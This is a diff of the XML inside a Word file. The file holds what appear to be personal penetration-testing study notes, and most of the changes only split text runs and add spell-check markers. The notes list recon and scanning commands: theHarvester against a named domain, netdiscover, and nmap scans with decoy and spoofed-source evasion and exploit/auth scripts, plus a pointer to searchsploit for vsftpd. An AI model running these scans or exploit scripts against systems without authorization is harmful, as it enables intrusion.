             </w:r>
             <w:r>
               <w:rPr>
@@ -858,11 +925,19 @@
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>whatweb 192</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>whatweb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> 192</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -970,12 +1045,14 @@
               </w:rPr>
               <w:t>-</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
               <w:t>theHarvester</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -1005,7 +1082,21 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t xml:space="preserve">-theHarvester -d erertech.com </w:t>
+              <w:t>-</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>theHarvester</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -d erertech.com </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1085,13 +1176,23 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:r>
-              <w:t>Sudo apt update</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>Sudo apt install python-pip</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> apt update</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> apt install python-pip</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1345,9 +1446,37 @@
             <w:tcW w:w="4675" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>Sudo netdiscover</w:t>
-            </w:r>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>netdiscover</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -1582,7 +1711,23 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>Nmap -sS {IPADDRESS}</w:t>
+              <w:t>Nmap -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>sS</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> {IPADDRESS}</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1613,24 +1758,53 @@
             <w:tcW w:w="4675" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>Sudo nmap -sU {IPADDRESS}</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Nmap -s</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sU</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {IPADDRESS}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Nmap -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>s</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1639,6 +1813,7 @@
               </w:rPr>
               <w:t>T</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -1679,8 +1854,16 @@
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>man nmap</w:t>
-            </w:r>
+              <w:t xml:space="preserve">man </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve"> – manual, really helps!</w:t>
             </w:r>
@@ -1731,14 +1914,35 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:r>
-              <w:t>Sudo nmap -</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
             </w:r>
             <w:r>
               <w:t>O</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> {ipaddress}</w:t>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1765,36 +1969,156 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:r>
-              <w:t>Sudo nmap -sV {ipaddress}</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Sudo nmap -A {ipaddress}</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t>Sudo nmap -sV –version-intensity 9 {ipaddress}</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t>nmap -sn {ipaddress}</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sV</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -A {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sV</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –version-intensity 9 {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sn</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
             <w:r>
               <w:t>-255</w:t>
@@ -1808,12 +2132,21 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>nmap -p</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -p</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1834,7 +2167,23 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t xml:space="preserve"> {ipaddress}</w:t>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -1883,8 +2232,29 @@
             <w:tcW w:w="4675" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Sudo nmap -f {ipaddress} </w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -f {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve">} </w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve">– </w:t>
@@ -1945,17 +2315,46 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">-Sudo nmap -D </w:t>
+              <w:t>-</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -D </w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve">RND:5 </w:t>
             </w:r>
             <w:r>
-              <w:t>{ipaddress}</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> -sS</w:t>
-            </w:r>
+              <w:t>{</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sS</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p/>
           <w:p/>
@@ -2007,10 +2406,58 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">-Sudo nmap -D </w:t>
-            </w:r>
-            <w:r>
-              <w:t>{ipaddress}, D {ipaddress}, {ipaddress}, {ipaddress}</w:t>
+              <w:t>-</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -D </w:t>
+            </w:r>
+            <w:r>
+              <w:t>{</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}, D {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}, {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}, {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2057,8 +2504,29 @@
             <w:tcW w:w="4675" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>Sudo nmap -S 8.8.8.8 -Pn -e</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -S 8.8.8.8 -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Pn</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -e</w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve"> eth0</w:t>
@@ -2129,12 +2597,27 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Sudo </w:t>
-            </w:r>
-            <w:r>
-              <w:t>nmap –script auth 192.168.1.75 -sS</w:t>
-            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –script auth 192.168.1.75 -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sS</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve">   </w:t>
             </w:r>
@@ -2151,63 +2634,136 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Sudo nmap –script </w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –script </w:t>
             </w:r>
             <w:r>
               <w:t>malware</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> 192.168.1.75 -sS   </w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Sudo nmap –script banner 192.168.1.75 -sS   </w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Sudo nmap –script exploit 192.168.1.75 -sS   </w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:t>Sudo nmap</w:t>
-            </w:r>
+              <w:t xml:space="preserve"> 192.168.1.75 -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sS</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve">   </w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –script banner 192.168.1.75 -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sS</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve">   </w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –script exploit 192.168.1.75 -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sS</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve">   </w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve"> –script-help {name}</w:t>
             </w:r>
@@ -2218,11 +2774,32 @@
             <w:tcW w:w="4675" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>Sudo nmap –script</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> ftp-anon.nse 192.168.175</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –script</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> ftp-</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>anon.nse</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> 192.168.175</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2258,8 +2835,16 @@
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>Manual Vulnerability Analysis and searchploit</w:t>
-            </w:r>
+              <w:t xml:space="preserve">Manual Vulnerability Analysis and </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>searchploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -2281,8 +2866,37 @@
                 <w:numId w:val="5"/>
               </w:numPr>
             </w:pPr>
-            <w:r>
-              <w:t>Sudo nmap -sV {ipaddress}</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sV</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2294,7 +2908,15 @@
               </w:numPr>
             </w:pPr>
             <w:r>
-              <w:t>Find version (vsftpd 2.3.)</w:t>
+              <w:t>Find version (</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>vsftpd</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> 2.3.)</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2306,155 +2928,195 @@
               </w:numPr>
             </w:pPr>
             <w:r>
-              <w:t>Google it if theres already existing exploitation</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
